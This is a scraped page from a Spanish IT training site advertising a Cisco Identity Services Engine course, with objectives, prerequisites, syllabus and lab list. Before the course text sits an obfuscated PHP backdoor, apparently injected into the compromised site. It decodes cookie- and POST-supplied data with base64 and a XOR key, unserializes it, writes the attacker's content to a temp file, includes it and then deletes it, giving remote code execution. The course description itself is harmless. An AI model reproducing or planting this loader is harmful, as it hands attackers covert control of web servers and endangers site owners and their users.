$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Implementing and Configuring Cisco Identity Services Engine|Grupo Loyal

Implementing and Configuring Cisco Identity Services Engine

The Implementing and Configuring Cisco Identity Services Engine course shows you how to deploy and use Cisco Identity Services Engine (ISE) v2.4, an identity and access control policy platform that simplifies the delivery of consistent, highly secure access control across wired, wireless and VPN connections. This hands-on course provides you with the knowledge and skills required to implement and use Cisco ISE, including policy enforcement, profiling services, web authentication and guest access services, BYOD, endpoint compliance services, and TACACS+ device administration. Through expert instruction and hands-on practice, you will learn how to use Cisco ISE to gain visibility into what is happening in your network, streamline security policy management and contribute to operational efficiency.

Delegates will be expected to work in groups and share lab equipment, If you are attending virtually you may also be required to work in virtual breakout rooms. Extended hours may also be required to cover all of the content included in this class.

Objetivos

After completing this course you should be able to:

Describe Cisco ISE deployments, including core deployment components and how they interact to create a cohesive security architecture. Describe the advantages of such a deployment and how each Cisco ISE capability contributes to these advantages.
Describe concepts and configure components related to 802.1X and MAC Authentication Bypass (MAB) authentication, identity management, and certificate services.
Describe how Cisco ISE policy sets are used to implement authentication and authorization, and how to leverage this capability to meet the needs of your organization.
Describe third-party network access devices (NADs), Cisco TrustSec®, and Easy Connect.
Describe and configure web authentication, processes, operation, and guest services, including guest access components and various guest access scenarios.
Describe and configure Cisco ISE profiling services, and understand how to monitor these services to enhance your situational awareness about network-connected endpoints. Describe best practices for deploying this profiler service in your specific environment.
Describe BYOD challenges, solutions, processes, and portals. Configure a BYOD solution, and describe the relationship between BYOD processes and their related configuration components. Describe and configure various certificates related to a BYOD solution.
Describe the value of the My Devices portal and how to configure this portal.
Describe endpoint compliance, compliance components, posture agents, posture deployment and licensing, and the posture service in Cisco ISE.
Describe and configure TACACS+ device administration using Cisco ISE, including command sets, profiles, and policy sets. Understand the role of TACACS+ within the authentication, authentication, and accounting (AAA) framework and the differences between the RADIUS and TACACS+ protocols.
Migrate TACACS+ functionality from Cisco Secure Access Control System (ACS) to Cisco ISE, using a migration tool.

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
25 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Individuals involved in the deployment and maintenance of the Cisco ISE platform.

Conocimientos requeridos

Attendees should meet the following prerequisites:

CCNA Security certification ICND1 or CCNA and IINS.
Understand the concepts of 802.1X.
Familiarity with Cisco AnyConnect Secure Mobility Client.
Familiarity with Microsoft Windows and Active Directory.
Pre-requisitos:
8021X-CPLL - Introduction to 802.1X Operations for Cisco Security Professionals - CPLL
CCNA - Implementing and Administering Cisco Solutions
SCOR - Implementing and Operating Cisco Security Core Technologies

Temario

Introducing Cisco ISE Architecture and Deployment

Using Cisco ISE as a Network Access Policy Engine
Cisco ISE Use Cases
Describing Cisco ISE Fucntions
Cisco ISE Deployment Models
Context Visibility
Cisco ISE Policy Enforcement

Using 802.1X for Wired and Wireless Access
Using MAC Authentication Bypass for Wired and Wireless Access
Introducing Identity Management
Configuring Certificate Services
Introducing Cisco ISE Policy
Implementing Third-Party Network Access Device Support
Introducing Cisco TrustSec
TrustSec Configuration
Easy Connect
Web Authentication and Guest Services

Introducing Web Access with Cisco ISE
Introducing Guest Access Components
Configuring Guest Access Services
Configure Sponsor and Guest Portals
Cisco ISE Profiler

Introducing Cisco ISE Profiler
Profiling Deployment and Best Practices
Cisco ISE BYOD

Introducing the Cisco ISE BYOD Process
Describing BYOD Flow
Configuring the My Devices Portal
Configuring Certificates in BYOD Scenarios
Cisco ISE Endpoint Compliance Services

Introducing Endpoint Compliance Services
Configuring Client Posture Services and Provisioning
Working with Network Access Devices

Cisco ISE TACACS+ Device Administration
Configure TACACS+ Device Administration Guidelines and Best Practices
Migrating from Cisco ACS to Cisco ISE
Labs

Lab 1: Access the SISE Lab and Install ISE 2.4
Lab 2 : Configure Initial Cisco ISE Setup, Gui Familiarization and System Certificate Usage
Lab 3: Integrate Cisco ISE with Active Directory
Lab 4: Configure Cisco ISE Policy
Lab 5: Configure Access Policy for Easy Connect
Lab 6: Configure Guest Access
Lab 7: Configure Guest Access Operations
Lab 8: Create Guest Reports
Lab 9: Configure Profiling
Lab 10: Customize the Cisco ISE Profiling Configuration
Lab 11: Create Cisco ISE Profiling Reports
Lab 12: Configure BYOD
Lab 13: Blacklisting a Device
Lab 14: Configure Cisco ISE Compliance Services
Lab 15: Configure Client Provisioning
Lab 16: Configure Posture Policies
Lab 17: Test and Monitor Compliance Based Access
Lab 18: Test Compliance Policy
Lab 19: Configure Cisco ISE for Basic Device Administration
Lab 20: Configure TACACS+ Command Authorization

Solicita información del curso

It Formacion

It Formacion